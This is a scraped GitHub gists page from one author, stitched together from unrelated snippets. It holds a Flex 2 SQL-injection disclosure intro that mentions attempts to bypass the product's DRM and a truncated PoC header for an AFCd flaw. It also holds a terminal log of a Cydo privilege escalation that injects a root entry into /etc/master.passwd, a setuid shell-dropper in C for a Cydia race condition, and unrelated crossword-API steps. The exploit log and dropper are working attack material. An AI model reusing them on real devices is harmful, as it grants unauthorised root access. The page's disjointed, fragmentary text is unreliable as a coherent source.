
PythEch

  • Amsterdam
@PythEch
PythEch / flex_disclosure.md
Last active June 22, 2016 18:37
Flex Server Multiple Vulnerabilities

Introduction

This gist includes multiple SQL injection vulnerabilities I found by accident on a bus while travelling. These vulnerabilities are easy to find, easy to exploit, and critical.

Background

I have already paid for Flex legacy but can't buy Flex 2 because of credit card restrictions. Anyway, I decided to give Flex 2 a shot and downloaded the beta from getdelta.co.

For fun, I tried to figure out whether spoofing the UDID is possible by patching Flex 2 itself. I already knew you had put so much work into DRM. I'm still unsuccessful at this.

#! /usr/bin/env python
"""
PoC of AFCd Vulnerability After Pangu Jailbreak
Copyright (C) 2014 PythEch
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
PythEch / gist:d181bf1411057e480586
Last active June 22, 2016 18:38
Cydo Arbitrary Write Local Privilege Escalation
Hakans-iPhone:/var/tmp mobile$ ln -s /etc/master.passwd
Hakans-iPhone:/var/tmp mobile$ mv master.passwd cydia.log
Hakans-iPhone:/var/tmp mobile$ /usr/libexec/cydia/cydo ":0:0::0:0:System Administrator:/var/root:/bin/sh"
thou shalt not pass
Hakans-iPhone:/var/tmp mobile$ su cydo
Hakans-iPhone:/var/tmp root# cat /etc/master.passwd
##
# User Database
#
# This file is the authoritative user database.
PythEch / poc.md
Last active July 11, 2022 00:46
MobileCydia.mm Race Condition LPE

Generic shell dropper:

#include <sys/types.h>
#include <unistd.h>

/* Minimal shell dropper: once executed with root privileges via the race,
 * it sets the real/effective uid to 0 and replaces itself with /bin/sh. */
int main(int argc, char **argv, char **envp) {
    setuid(0);
    /* execl() is variadic; the argument list must end with a (char *)NULL,
     * not a bare 0 (an int), which is undefined on LP64 targets. */
    execl("/bin/sh", "/bin/sh", (char *)NULL);
    return 0;
}
1. Get https://nyt-games-prd.appspot.com/svc/crosswords/v3/games-hub-puzzles.json
2. Extract results.mini_puzzle.[*].puzzle_id
3. Then head over to https://nyt-games-prd.appspot.com/svc/crosswords/v6/${puzzle_id}.json
4. Parse the data.